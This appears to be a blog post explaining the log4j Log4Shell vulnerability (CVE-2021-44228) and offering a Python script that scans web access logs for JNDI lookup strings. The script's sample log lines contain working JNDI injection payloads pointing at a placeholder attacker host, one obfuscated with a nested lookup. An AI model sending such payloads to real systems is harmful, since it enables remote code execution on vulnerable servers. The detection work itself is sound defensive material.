How attackers use the log4j vulnerability (CVE-2021-44228) to access applications and how to quickly patch it in production/pilot systems

Aditya
Dec 17, 2021

A vulnerability (CVE-2021-44228) in Apache Log4j, a widely used logging package for Java, has been found. It was first reported to Apache on November 24, 2021 and was patched in version 2.15.0 of Log4j on December 9, 2021.

To learn more about logging frameworks and wrappers in Java, see What is the difference between SLF4j and log4J/log4j2? (Logging frameworks vs Logging wrappers in java) | by Aditya | Medium

How it works → This vulnerability allows attackers to execute arbitrary code by sending crafted input that ends up in log messages (for example in the User-Agent string, referrer, or username) to internet-facing applications that use log4j.

Once those messages are logged, the vulnerability triggers a JNDI lookup that queries a threat-actor-controlled LDAP server, which responds with information that includes a remote Java class file that can then be executed.

Some of the initial investigations suggest those remote files install crypto-mining bots on compromised systems.

Which components are impacted → Any public-facing application that is invoked through APIs and uses the log4j library for logging is impacted, because this bug lets an attacker submit crafted messages in API requests (in the User-Agent string, referrer, username) that invoke the remote execution capability.
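As an added example (not part of the original post), here is a small Python detector that scans web-server access logs for the crafted request fields described above, normalizing nested lookups first so that a lightly obfuscated JNDI string is still recognised. It assumes the Apache/nginx combined log format; the sample lines and the attacker.example host are constructed.

```python
import re

_INNER = re.compile(r"\$\{([^${}]*)\}")                # innermost ${...}, no nested "${"
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)  # the lookup CVE-2021-44228 abuses
_CLF = re.compile(  # Apache/nginx "combined" access-log layout (assumed input shape)
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def _resolve(m):
    # Evaluate one innermost lookup as log4j would: ${x:-default}, ${lower:x}, ${upper:x}.
    body = m.group(1)
    if ":-" in body:                       # default-value form keeps the default
        return body.split(":-", 1)[1]
    key, sep, arg = body.partition(":")
    if sep and key.lower() in ("lower", "upper"):
        return arg.lower() if key.lower() == "lower" else arg.upper()
    return m.group(0)                      # unknown lookup: leave as written

def normalize_lookups(text, max_rounds=20):
    # Collapse innermost lookups until stable, so nested/obfuscated text equals its plain form.
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text

def is_jndi_lookup(field):
    # True if the field, once normalized, carries a ${jndi:...} lookup.
    return bool(_JNDI.search(normalize_lookups(field)))

def scan_access_log(lines):
    # (line_no, field, client_ip) for each request carrying a JNDI lookup in a logged field.
    hits = []
    for n, line in enumerate(lines, 1):
        m = _CLF.match(line)
        if not m:
            continue                       # lines in another format are skipped
        for field in ("user", "request", "referer", "agent"):
            if is_jndi_lookup(m.group(field)):
                hits.append((n, field, m.group("host")))
    return hits

# Constructed sample lines, not real traffic; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.8 - - [10/Dec/2021:10:15:05 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:15:09 +0000] "GET /api/v1/items HTTP/1.1" 200 256 "${${lower:j}ndi:ldap://attacker.example/b}" "curl/7.79"',
    '203.0.113.10 - - [10/Dec/2021:10:15:12 +0000] "GET /health HTTP/1.1" 200 2 "-" "${java:version}"',
]
```

The third sample line shows why the check is anchored on the jndi prefix rather than on any `${`: a benign-looking lookup in a header is not flagged, while the nested variant on line two is.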

Aditya

Principal data engineer → Distributed Threat hunting security platform | aws certified solutions architect | gssp-java | Chicago-IL